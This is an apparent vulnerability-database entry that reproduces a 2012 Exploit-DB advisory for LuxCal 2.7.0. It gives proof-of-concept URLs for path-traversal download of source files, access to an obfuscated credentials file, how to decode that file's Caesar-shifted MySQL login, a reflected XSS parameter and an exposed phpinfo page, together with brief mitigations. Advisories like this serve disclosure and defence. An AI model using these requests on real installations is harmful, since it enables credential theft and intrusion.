LuxCal v2.7.0 Multiple Remote Vulnerabilities

vendor:

LuxCal

by:

L0n3ly-H34rT

8,8

CVSS

HIGH

Local File Inclusion, Information Disclosure, XSS, phpinfo()

94, 200, 79, 564

CWE

Product Name: LuxCal

Affected Version From: 2.7.0

Affected Version To: 2.7.0

Patch Exists: NO

Related CWE: N/A

CPE: a:luxsoft:luxcal:2.7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows

2012

LuxCal v2.7.0 Multiple Remote Vulnerabilities

LuxCal v2.7.0 is vulnerable to multiple remote vulnerabilities, including Local File Inclusion, Information Disclosure, XSS, and phpinfo(). The Local File Inclusion vulnerability can be exploited by sending a specially crafted HTTP request containing directory traversal characters (e.g. “../”) to the vulnerable application. This will allow an attacker to download the source code of the application. The Information Disclosure vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable application. This will allow an attacker to view the encrypted information of the database. The XSS vulnerability can be exploited by sending a specially crafted HTTP request containing malicious JavaScript code to the vulnerable application. This will allow an attacker to execute arbitrary JavaScript code in the context of the vulnerable application. The phpinfo() vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable application. This will allow an attacker to view the configuration information of the application.

Mitigation:

To mitigate the Local File Inclusion vulnerability, the application should validate user-supplied input and filter out any directory traversal characters. To mitigate the Information Disclosure vulnerability, the application should encrypt the information of the database. To mitigate the XSS vulnerability, the application should validate user-supplied input and filter out any malicious JavaScript code. To mitigate the phpinfo() vulnerability, the application should restrict access to the phpinfo() page.

Source

Exploit-DB raw data:

#################################################
### Exploit Title: LuxCal v2.7.0 Multiple Remote Vulnerabilities
### Date: 17/09/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.luxsoft.eu/
### Software Link: http://www.luxsoft.eu/dloader.php?file=luxcal270.zip
### Version: 2.7.0
### Tested on: Linux/Windows 
#################################################

1- Local File Inclusion :

* P.O.C :

http://127.0.0.1/luxcal270/dloader.php?fName=../index.php

this is example for download the source of index script , you will see the source inside as name of affected file "dloader.php"

2- Information Disclosure :

* P.O.C :

http://127.0.0.1/luxcal270/lcaldbc.dat

- you will see the information of database but encrypte as Caesar cipher methode in shift 11 e.g. :

LuxCal
2.7.0
p 5 {x 0;h 9 "adrpawdhi";x 1;h 4 "ajmm";x 2;h 4 "gddi";x 3;h 6 "000000";x 4;h 0 "";}

- my information in database is :

mysql server : localhost

mysql username : root

mysql password : 000000

mysql database : luxx

- when i install script all this name of information is encrypte and the word become as we see before in file "lcaldbc.dat" :

mysql server : adrpawdhi

mysql username : gddi

mysql password : 000000

mysql database : ajmm

- you ask me how to decrypt that , you can decrypt by many ways but i give the easy way here :

http://www.richkni.co.uk/php/crypta/caesar.php

you can put your text and submit to decipher that word , then search in " Processed text - shift 11 "

you will see your decrypted word ..

3- XSS :

* P.O.C :

http://127.0.0.1/luxcal270/index.php?cD=[XSS]

also some files is affected 

4- phpinfo () :

http://127.0.0.1/luxcal270/pages/phpinfo.php

############################################

# Greetz to my friendz